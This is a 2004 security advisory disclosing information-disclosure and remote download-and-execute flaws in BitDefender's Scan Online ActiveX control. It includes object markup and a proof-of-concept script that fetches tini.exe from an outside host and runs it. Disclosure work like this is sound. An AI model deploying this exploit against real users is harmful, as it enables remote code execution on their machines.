BitDefender's online scanning service has Active-X related flaws that allow an attacker to run arbitrary code server side.
b99278bb29477cd2c8b3b823340d554551425884717cdd650dc007d6d6ad6370
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: BitDefender Scan Online(ActiveX)
Vendors: http://www.bitdefender.com/scan/Msie/index.php
Platforms: Windows
Bug: Remote File Download & Execute & Private Information
Disclosure
Risk: High - Running Arbitary Code
Exploitation: Remote with browser
Date: 19 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
This is a quote of BitDefender Scan Online Description:
"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files.
This is a quote of the page title:
"BitDefender AntiVirus - Data Security, AntiVirus Software, Free
Protection".
The meaning of this sentence is very far from reality.
I believe this to be a ridiculous that an AntiVirus will deliver and execute
a virus on my system.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
"BitDefender Scan Online" downloads its components and registered
the following COM/ActiveX Object:
"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID:
80DD2229-B8E4-4C77-B72F-F22972D723EA
"BitDefender Scan Online" has confusing protection, all properties and
functions cannot be set/accessed by the :
object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")
It can only be set/accessed using(html object tag created object):
"<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>"
----------------------------------------------------------------------------
--------------------------------------------------
"BitDefender Scan Online" Disclosures the users information, allowing a
remote user to see
all drives and folders of the system using this simple code:
------------------- CUT HERE -------------------
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
------------------- CUT HERE -------------------
----------------------------------------------------------------------------
--------------------------------------------------
"BitDefender Scan Online" contains a function that will
***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***
For Example:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;
function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."